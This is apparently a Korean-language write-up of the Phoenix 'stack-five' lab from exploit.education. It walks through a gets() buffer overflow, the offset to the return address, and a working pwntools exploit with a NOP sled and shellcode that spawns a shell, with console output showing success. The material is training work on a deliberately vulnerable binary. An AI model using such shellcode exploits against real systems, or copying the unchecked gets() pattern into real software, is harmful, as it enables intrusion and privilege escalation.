[Phoenix] Stack five

728x90

1. intro

2. code 및 분석

2.1. C code

/*
 * phoenix/stack-five, by https://exploit.education
 *
 * Can you execve("/bin/sh", ...) ?
 *
 * What is green and goes to summer camp? A brussel scout.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}

2.2. 분석

앞선 문제와 동일하며, start_level 함수에서 buffer에 값을 받아들인다.

3. 취약점 확인 및 공격 준비

3.1. 취약점

gets. 크기 확인 안함. ret address 변조 가능.

3.2. 공격 준비

우선 start_level의 buffer 변수에서 ret address까지 거리를 보면 아래와 같고,

...
   0x0000000000400595 <+8>:     lea    -0x80(%rbp),%rax
   0x0000000000400599 <+12>:    mov    %rax,%rdi
   0x000000000040059c <+15>:    callq  0x4003f0 <gets@plt>
   0x00000000004005a1 <+20>:    nop
   0x00000000004005a2 <+21>:    leaveq
   0x00000000004005a3 <+22>:    retq

이번에는 셀을 실행시켜야하기 때문에 shellcode가 필요하다.

pwntools를 이용해서 공격해보자.

4. exploit

처음에는 gdb로 알아낸 주소인 0x00007fffffffe660으로 return 하였는데 제대로 작동하지 않았고, 16 bytes씩 이동하며 시도하다 성공하였다.

from pwn import *

p = process('/opt/phoenix/amd64/stack-five')
e = context.binary = ELF('/opt/phoenix/amd64/stack-five')

pay = b''
pay += b'A'*0x88
pay += p64(0x00007fffffffe680)
pay += b'\x90'*0x10
pay += asm(shellcraft.sh())
pay += b'\x90'*40

p.sendafter('education\n',pay)
p.interactive()

user@phoenix-amd64:/opt/phoenix/amd64$ python /tmp/a.py
[+] Starting local process '/opt/phoenix/amd64/stack-five': pid 784
[!] Could not populate PLT: invalid syntax (unicorn.py, line 110)
[*] '/opt/phoenix/amd64/stack-five'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
    RPATH:    '/opt/phoenix/x86_64-linux-musl/lib'
[*] Switching to interactive mode
$ id
$ id
uid=1000(user) gid=1000(user) euid=405(phoenix-amd64-stack-five) egid=405(phoenix-amd64-stack-five) groups=405(phoenix-amd64-stack-five),27(sudo),1000(user)